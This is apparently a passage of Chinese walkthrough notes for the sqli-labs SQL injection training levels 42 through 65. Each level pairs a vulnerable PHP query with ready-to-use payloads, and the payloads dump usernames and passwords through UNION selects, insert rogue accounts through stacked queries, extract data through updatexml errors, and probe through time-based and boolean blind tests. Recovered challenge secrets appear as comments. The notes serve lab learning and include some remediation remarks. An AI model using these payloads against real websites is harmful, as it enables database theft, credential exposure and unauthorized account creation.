1 and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'%23
1 and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users'%23
1 and 1=2 union select 1,group_concat(username,0x23,password),3 from security.users%23
(參考三十八)

四十二  堆疊注入 報錯
Login
// Less-42: only the username is escaped; the password is interpolated raw,
// so the password field is the injection point. The heading marks this as a
// stacked-query level, which is what lets the payloads CREATE/INSERT rows and
// then log in with the inserted credentials.
$username = mysqli_real_escape_string($con1, $_POST["login_user"]);
$password = $_POST["login_password"];
$sql = "SELECT * FROM users WHERE username='$username' and password='$password'";
賬號隨意
密碼   a';create table W like users# //新增表
密碼   a';insert into users values(20,'xj','xj123')#  //新增賬號密碼
登入進去修改密碼

四十三
Login  
// Less-43: as Less-42, but the fields sit inside ('...'), so the payload
// opens with ') before the stacked INSERT.
$username = mysqli_real_escape_string($con1, $_POST["login_user"]);
$password = $_POST["login_password"];
$sql = "SELECT * FROM users WHERE username=('$username') and password=('$password')";
a');insert into users values(21,'xj','xj123')#
同上

四十四
// Less-44: same code shape as Less-42 (raw password, escaped username);
// per the notes the difference is only in feedback, so the stacked INSERT
// payload is reused.
$username = mysqli_real_escape_string($con1, $_POST["login_user"]);
$password = $_POST["login_password"];
$sql = "SELECT * FROM users WHERE username='$username' and password='$password'";
a';insert into users values(22,'w','w')#
同上

四十五
// Less-45: as Less-44 with the ('...') context, closing sequence ') .
$username = mysqli_real_escape_string($con1, $_POST["login_user"]);
$password = $_POST["login_password"];
$sql = "SELECT * FROM users WHERE username=('$username') and password=('$password')";
a');insert into users values(23,'j','j')#
同上

四十六 報錯
// Less-46: the sort parameter is spliced into ORDER BY unquoted. An ORDER BY
// target cannot be bound as a query parameter, so the only real fix is to
// whitelist the allowed column names; the notes detect the issue by toggling
// asc/desc and then use updatexml() for error-based extraction.
$id=$_GET['sort'];
$sql = "SELECT * FROM users ORDER BY $id";
sort=1 desc 或者asc,顯示結果不同,表明可以注入
sort=1 and updatexml(1,concat(0x23,database()),1)
sort=1 and updatexml(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)
sort=1 and updatexml(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1)
sort=1 and updatexml(1,concat(0x23,(select group_concat(username,0x23,password) from security.users)),1) 顯示不完全(updatexml 報錯回顯最多只有 32 個字元,超出部分要用 substr() 分段讀取)

四十七
// Less-47: ORDER BY '$id' — quoting does not protect an ORDER BY target; a '
// closes the literal and the rest is still parsed (a quoted string here just
// orders by a constant). Same whitelist remedy as Less-46.
$id=$_GET['sort'];
$sql = "SELECT * FROM users ORDER BY '$id'";
sort=1' and updatexml(1,concat(0x23,database()),1)%23
sort=1' and updatexml(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)%23
sort=1' and updatexml(1,concat(0x23,(select group_concat(username,0x23,password) from security.users)),1)%23 顯示不完全(同上,報錯回顯上限 32 個字元,需用 substr() 分段)

四十八 錯誤不回顯 時間盲注
// Less-48: same ORDER BY splice as Less-46, but (per the heading) errors are
// not echoed, so extraction falls back to time-based probes.
$id=$_GET['sort'];
$sql = "SELECT * FROM users ORDER BY $id";
sort=1 and if(length(database())>10,sleep(0),sleep(5)) %23

四十九 錯誤不回顯 時間盲注
// Less-49: quoted ORDER BY target, errors not echoed; time-based probe after
// closing the quote.
$id=$_GET['sort'];
$sql = "SELECT * FROM users ORDER BY '$id'";
sort=1' and if(length(database())>10,sleep(0),sleep(5)) %23

五十 時間盲注 堆疊注入(參考上面)
// Less-50: ORDER BY splice; the heading adds stacked queries on top of the
// time-based probe shown.
$id=$_GET['sort'];
$sql="SELECT * FROM users ORDER BY $id";
sort=1 and if(length(database())>10,sleep(0),sleep(5)) %23


五十一 時間盲注
// Less-51: quoted ORDER BY target; time-based probe after closing the quote.
$id=$_GET['sort'];
$sql="SELECT * FROM users ORDER BY '$id'";
sort=1' and if(length(database())>10,sleep(0),sleep(5)) %23

五十二 時間盲注
// Less-52: unquoted ORDER BY target; time-based probe.
$id=$_GET['sort'];
$sql="SELECT * FROM users ORDER BY $id";
sort=1 and if(length(database())>10,sleep(0),sleep(5)) %23

五十三 時間盲注
// Less-53: quoted ORDER BY target; time-based probe after closing the quote.
$id=$_GET['sort'];
$sql="SELECT * FROM users ORDER BY '$id'";
sort=1' and if(length(database())>10,sleep(0),sleep(5)) %23

五十四
// Challenge 54: single-quote context; the target data lives in the
// "challenges" schema (table/column names are read from information_schema
// first because they are not fixed).
$sql="SELECT * FROM security.users WHERE id='$id' LIMIT 0,1";
1' and 1=2 union select 1,database(),3%23
1' and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='challenges'%23
//sj7vpktxiq
1' and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='challenges' and table_name='sj7vpktxiq'%23
//id,sessid,secret_TXLH,tryy
1' and 1=2 union select 1,group_concat(sessid),3 from challenges.sj7vpktxiq%23
//d1c38a09acc34845c6be3a127a5aacaf
1' and 1=2 union select 1,group_concat(secret_TXLH),3 from challenges.sj7vpktxiq%23
//DwhfpvM0dzKLEqw9hi3PeJzY 

五十五
// Challenge 55: numeric id inside parentheses, closing token ) .
$sql="SELECT * FROM security.users WHERE id=($id) LIMIT 0,1";
1) and 1=2 union select 1,database(),3%23
1) and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='challenges'%23
//xwflfwldpp
1) and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='challenges' and table_name='xwflfwldpp'%23
//id,sessid,secret_DMUI,tryy
1)and 1=2 union select 1,group_concat(secret_DMUI),3 from challenges.xwflfwldpp%23
//YBNwglaRUDwbJ1Ze082Ju1Sn

五十六
// Challenge 56: ('...') context, closing sequence ') .
$sql="SELECT * FROM security.users WHERE id=('$id') LIMIT 0,1";
1') and 1=2 union select 1,database(),3%23
1') and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='challenges'%23
//z4d4ffn83s
1') and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='challenges' and table_name='z4d4ffn83s'%23
//id,sessid,secret_Y8GA,tryy
1') and 1=2 union select 1,group_concat(secret_Y8GA),3 from challenges.z4d4ffn83s%23
//PsQNyhePjSzrPUvoEdQruEx6

五十七
// Challenge 57: id wrapped in double quotes, closing token " .
$id= '"'.$id.'"';
$sql="SELECT * FROM security.users WHERE id=$id LIMIT 0,1";
1" and 1=2 union select 1,database(),3%23
1" and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='challenges'%23
//4i3eu5w9m5
1" and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='challenges' and table_name='4i3eu5w9m5'%23
//id,sessid,secret_YZ8G,tryy
1" and 1=2 union select 1,group_concat(secret_YZ8G),3 from challenges.4i3eu5w9m5%23
//kExPbOrEz78G0bfUGYmNpEJs

五十八
// Challenge 58: single-quote context, worked error-based with updatexml().
$sql="SELECT * FROM security.users WHERE id='$id' LIMIT 0,1";
1' and updatexml(1,concat(0x23,database()),1)%23
1' and updatexml(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema='challenges')),1)%23
//5z3vsai61i
1' and updatexml(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='5z3vsai61i')),1)%23
//id,sessid,secret_C8ER,tryy
1' and updatexml(1,concat(0x23,(select group_concat(secret_C8ER)from challenges.5z3vsai61i)),1)%23
//hmgTXQczwr2neRRzr1m9JvWO

五十九
// Challenge 59: numeric id, error-based with updatexml().
$sql="SELECT * FROM security.users WHERE id=$id LIMIT 0,1";
1 and updatexml(1,concat(0x23,database()),1)%23
1 and updatexml(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema='challenges')),1)%23
//h6hi5xoec7
1 and updatexml(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='h6hi5xoec7
')),1)%23
//id,sessid,secret_AI69,tryy
1 and updatexml(1,concat(0x23,(select group_concat(secret_AI69)from challenges.h6hi5xoec7)),1)%23
//0g7eQdUtHCmXtr4o8ZySKoYg

六十
// Challenge 60: id wrapped as ("..."), closing sequence ") .
$id = '("'.$id.'")';
$sql="SELECT * FROM security.users WHERE id=$id LIMIT 0,1";
1") and updatexml(1,concat(0x23,database()),1)%23
1") and updatexml(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema='challenges')),1)%23
//uw2q08bttr
1") and updatexml(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='uw2q08bttr')),1)%23
//id,sessid,secret_BUFB,tryy
1") and updatexml(1,concat(0x23,(select group_concat(secret_BUFB)from challenges.uw2q08bttr)),1)%23
//yJSBxWNO7xmCvhsQNNOQu2Y2

六十一
// Challenge 61: double parentheses around the quoted id, closing sequence ')) .
$sql="SELECT * FROM security.users WHERE id=(('$id')) LIMIT 0,1";
1')) and updatexml(1,concat(0x23,database()),1)%23
1')) and updatexml(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema='challenges')),1)%23
//avy2e9297x
1')) and updatexml(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='avy2e9297x
')),1)%23
//id,sessid,secret_NSKU,tryy
1')) and updatexml(1,concat(0x23,(select group_concat(secret_NSKU)from challenges.avy2e9297x)),1)%23
//8EhMs3hgKrmAcsmlJn4wVrSh

六十二  盲注
// Challenge 62: ('...') context, worked as boolean blind (length/ascii probes).
$sql="SELECT * FROM security.users WHERE id=('$id') LIMIT 0,1";
1') and length(database())=10 %23
challenges
1') and  ascii(substr((select table_name from information_schema.tables where table_schema='challenges' limit 0,1),1,1))<101%23 

六十三 盲注
// Challenge 63: single-quote context, boolean blind.
$sql="SELECT * FROM security.users WHERE id='$id' LIMIT 0,1";
1' and length(database())=10 %23

六十四 盲注
// Challenge 64: numeric id inside double parentheses, closing sequence )) .
$sql="SELECT * FROM security.users WHERE id=(($id)) LIMIT 0,1";
1))  and length(database())=10 %23
  
六十五 盲注
// Challenge 65: double quotes inside parentheses, closing sequence ") .
$id = '"'.$id.'"';
$sql="SELECT * FROM security.users WHERE id=($id) LIMIT 0,1";
1")  and length(database())=10 %23